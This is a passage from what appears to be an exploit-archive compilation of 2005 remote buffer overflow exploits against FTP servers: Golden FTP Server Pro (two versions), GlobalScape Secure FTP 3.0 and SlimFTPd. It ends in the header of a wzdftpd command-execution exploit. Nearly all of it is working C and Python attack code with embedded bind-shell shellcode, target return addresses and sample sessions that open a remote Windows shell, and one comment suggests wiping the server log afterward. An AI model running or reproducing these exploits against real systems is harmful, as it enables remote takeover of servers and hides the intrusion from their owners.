printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(21);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Waiting for welcome message...\n");
Sleep(10);
recv(mysocket,rec,1024,0);
printf("Sending evil request...\n");
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
printf("Error Sending evil request.\r\n");
closesocket(mysocket);
exit(1);
}
Sleep(10);
printf("Success.\n");
closesocket(mysocket);
WSACleanup();
}
// [2005-04-29]
21 Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd)
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
risk : highly critical
vender status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vender address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use another FTP server .
compiled with visual c++ 6 : cl golden-ftp.c
greetz : IHSTeam members,exploit-dev mates,securiteam,str0ke-milw0rm
(C) IHS security 2005
*/
/*
D:\projects>golden-ftp 127.0.0.1 21 0
-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r
[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 755 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully !
[+] restart the Ftp server then nc 127.0.0.1 4444
D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Golden FTP Server Pro>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 755
// 5 byte user command + 332 byte NOP junk + 4 byte return address
// + 15 byte NOP + 399 byte shellcode
// using metasploit great shellcode LPORT=4444 Size=399
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x 85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x 84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x 84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x 42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x 89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\x da\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x 89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x 53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x 85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\x cc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x 68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x 52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x 7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\x b5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\x b4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\x d0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\x c6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\x dc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\x a1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x 08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x 7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\x f0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x 7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x 7a\xff\x98";
unsigned int rc,rc2,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
unsigned char *recvbuf;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char hex1[] = "\x75\x73\x65\x72\x20";
char hex2[] = "\x70\x61\x73\x73\x20\x61\x61\x61\x61";
char hex3[] = "\x5C\x6E";
char winxpsp1[] = "\x57\x94\xAE\x77"; // shell32.dll :D
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
int main (int argc, char *argv[]){
if(argc < 3) {
printf("\n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r\n");
printf("-------- usage : golden-ftp.exe host port target\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 2 : 1\n");
printf("-------- eg : golden-ftp.exe 127.0.0.1 80 0\n\n");
exit(-1) ;
}
printf("\n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");
exit(-1);
}
// Creating heart of exploit code
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer,hex1,sizeof(hex1)-1);
memcpy(buffer+337,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+356,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit code
recvbuf = malloc(256);
memset(recvbuf,0,256);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[+] attacking host %s\n" , argv[1]) ;
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
rc2=recv(sock,recvbuf,256,0);
Sleep(1000);
send(sock,buffer,strlen(buffer),0);
send(sock,"\n",1,0);
rc2=recv(sock,recvbuf,256,0);
Sleep(1000);
send(sock,hex2,strlen(hex2),0);
send(sock,"\n",1,0);
printf("[+] exploit sent successfully !\n");
printf("[+] restart the Ftp server then nc %s 4444\n\n",argv[1]);
}
else {
printf("[-] ouch! Server is not listening .... \n\n");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code
// [2005-04-29]
21 Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define RETADDR 0x77F510B0
char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\x be\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\x bf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\x bf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x 79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\x b2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\x e1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\x b2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x 68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\x be\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\x f7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x 53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x 69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x 41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x 8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x 8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\x eb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\x fd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\x e7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x 9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x 33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x 41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\x cb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x 41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x 41\x44\x1d";
int main ( int argc, char *argv[] )
{
WSADATA wsa;
SOCKET sock;
char data[6667], evil[7776];
struct sockaddr_in addr;
printf("\n\n >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<\n :: by darkeagle [unl0ck] ::\n >> http://unl0ck.org <<\n\n");
WSAStartup(MAKEWORD(2,0), &wsa);
if ( argc < 3 )
{
printf(" >usage: %s <ip> <port>\n\n", argv[0]);
exit(0);
}
printf(" ip: %s, port: %d\n", argv[1], atoi(argv[2]));
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
memset(data, 0x00, sizeof(data));
memset(evil, 0x00, sizeof(evil));
memset(data, 0x55, 372);
*(long*)&data[332] = RETADDR;
memcpy(data, &shellcode, sizeof(shellcode));
printf(" [`] connecting...\n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connected\n"); } else { exit(0); }
sprintf(evil, "USER %s\r\nPASS\r\n", data);
Sleep(1000);
send(sock, evil, strlen(evil), 1);
printf(" [+] send. w8ing while ftpd will reboot...\n\n");
closesocket(sock);
WSACleanup();
return 0;
}
// [2005-04-29]
21 GlobalScape Secure FTP Server 3.0 Buffer Overflow Exploit
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
import socket
import struct
import time
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
sc +="\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x56\x4b\x58"
sc +="\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x 4b\x58\x4e\x47"
sc +="\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x 4a\x41\x4b\x58"
sc +="\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x 49\x54\x4b\x38"
sc +="\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x 49\x39\x4e\x4a"
sc +="\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x 4d\x50\x41\x30"
sc +="\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x 4a\x42\x45\x57"
sc +="\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x 48\x36\x4b\x58"
sc +="\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x 4b\x4e\x43\x30"
sc +="\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x 41\x56\x43\x4c"
sc +="\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x 4b\x58\x42\x44"
sc +="\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x 42\x54\x4a\x50"
sc +="\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x 42\x35\x4f\x4f"
sc +="\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x 4a\x36\x43\x33"
sc +="\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x 46\x55\x4f\x4f"
sc +="\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x 42\x45\x4f\x4f"
sc +="\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x 4d\x4e\x4a\x50"
sc +="\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x 4a\x36\x49\x4d"
sc +="\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x 43\x45\x43\x45"
sc +="\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x 43\x35\x4f\x4f"
sc +="\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x 43\x35\x49\x38"
sc +="\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x 47\x4c\x47\x55"
sc +="\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x 4f\x4f\x42\x4d"
sc +="\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x 4f\x4f\x48\x4d"
sc +="\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x 49\x44\x48\x38"
sc +="\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x 46\x45\x45\x35"
sc +="\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x 48\x4c\x49\x37"
sc +="\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x 48\x36\x4c\x56"
sc +="\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x 45\x4e\x4c\x56"
sc +="\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x 4c\x36\x46\x54"
sc +="\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x 50\x4f\x44\x54"
sc +="\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x 4c\x47\x4a\x53"
sc +="\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x 43\x4b\x48\x51"
sc +="\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x 47\x35\x44\x35"
sc +="\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x 41\x45\x45\x35"
sc +="\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x 45\x30\x50\x4c"
sc +="\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x 47\x33\x4f\x4f"
sc +="\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x 46\x36\x4f\x4f"
sc +="\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x 50\x4c\x42\x4e"
sc +="\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x 5a"
buffer = '\x41'*2043+ struct.pack("<L",0x7C4FEDBB)+'\x90'*36+sc
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n[+] Evil GlobalFTP 3.0 Secure Server Exploit"
print "[+] Coded by muts"
connect=s.connect(('192.168.1.153',21))
d=s.recv(1024)
print "[+] " +d
print "[+] Sending Username"
time.sleep(1)
s.send('USER muts\r\n')
s.recv(1024)
print "[+] Sending Password"
time.sleep(1)
s.send('PASS muts\r\n')
s.recv(1024)
print "[+] Sending evil buffer"
time.sleep(1)
s.send(buffer+'r\n')
print "[+] Connect to port 4444 on victim Machine!\n"
except:
print "Can't connect to ftp"
# [2005-05-01]
21 SlimFTPd <= 3.16 Remote Buffer Overflow Exploit
/*
*
* Written by redsand
* <[email protected]>
*
* Jul 22, 2005
* Vulnerable: SlimFtpd v3.15 and v3.16
* origional vuln found by:
*
* Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN
#include <winsock2.h>
#include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
#pragma comment(lib, "ws2_32.lib") // ms vc++
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define USERNAME "anonymous"
#define PASSWORD "[email protected]"
// buf size = 512 + max
#define NOP 0x90
#define BUFSIZE 2048
#define PORT 21
#define LSZ 525
unsigned char *login [] = { "USER "USERNAME"\r\n", "PASS "PASSWORD"\r\n", "LIST ", "XMKD AAAAAAAA\r\n", "CWD AAAAAAAA\r\n", NULL };
unsigned char *targets [] =
{
"Windows XP SP0/SP1 ",
"Windows XP SP2 ",
"Windows 2000 SP1/SP4 ",
"Windows 2003 Server SP1",
"Denial-of-Service",
NULL
};
unsigned long offsets [] =
{
// jmp esi
0x71a5b80b, // Windows XP 5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)
0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)
0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000 5.0.4.0 SP4 (IA32)
0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)
0x44434241,
0
};
unsigned char shellcode[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
long gimmeip(char *);
void keepout();
void shell(int);
void keepout() {
#ifdef WIN
WSACleanup();
#endif
exit(1);
}
void banner() {
printf("- SlimFtpd v3.15 and v3.16 remote buffer overflow\n");
printf("- Written by redsand (redsand [at] redsand.net)\n");
}
void usage(char *prog) {
int i;
banner();
printf("- Usage: %s <target ip> <OS> [target port]\n", prog);
printf("- Targets:\n");
for (i=0; targets[i] != NULL; i++)
printf("\t- %d\t%s\n", i, targets[i]);
printf("\n");
exit(1);
}
/************************************************** *************/
long gimmeip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
keepout();
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
int main(int argc, char *argv[]) {
int sock;
char expbuff[BUFSIZE];
char recvbuff[BUFSIZE];
void *p;
unsigned short tport = PORT; // default port for ftp
struct sockaddr_in target;
unsigned long retaddr;
int len,i=0;
unsigned int tar;
#ifdef WIN
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
if(argc < 3) usage(argv[0]);
if(argc == 4)
tport = atoi(argv[3]);
banner();
tar = atoi(argv[2]);
retaddr = offsets[tar];
printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);
printf("\n[+] Initialize socket.");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...\n");
keepout();
}
memset(&target,0x00,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);
printf("\n[+] Prepare exploit buffer... ");
memset(expbuff, 0x00, BUFSIZE);
memset(recvbuff, 0x00, BUFSIZE);
memcpy(expbuff, login[2], strlen(login[2]));
p = &expbuff[strlen(login[2]) ];
memset(p, NOP, LSZ);
memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);
*(unsigned long *)&expbuff[507] = retaddr;
p = &expbuff[511];
memcpy(p, "\n",1);
printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
fflush(stdout);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
keepout();
}
printf(" - OK.\n");
len = recv(sock, recvbuff, BUFSIZE-1, 0);
if(len < 0) {
fprintf(stderr,"\nError response server\n");
exit(1);
}
printf(" - Size of payload is %d bytes",strlen(expbuff));
printf("\n[+] Initiating exploit... ");
printf("\n - Sending USER...");
if(send(sock,login[0],strlen(login[0]),0)==-1) {
fprintf(stderr,"\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE-1,0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Sending PASS...");
if(send(sock,login[1],strlen(login[1]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Creating X-DIR...");
if(send(sock,login[3],strlen(login[3]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
if(send(sock,login[4],strlen(login[4]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Sending Exploit String...");
if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
printf("- OK.");
printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );
#ifdef WIN
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
return(0);
}
// [2005-07-25]
21 WzdFTPD <= 0.5.4 Remote Command Execution Exploi
################################################## ####
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom
# site commands...
#
# August 2005
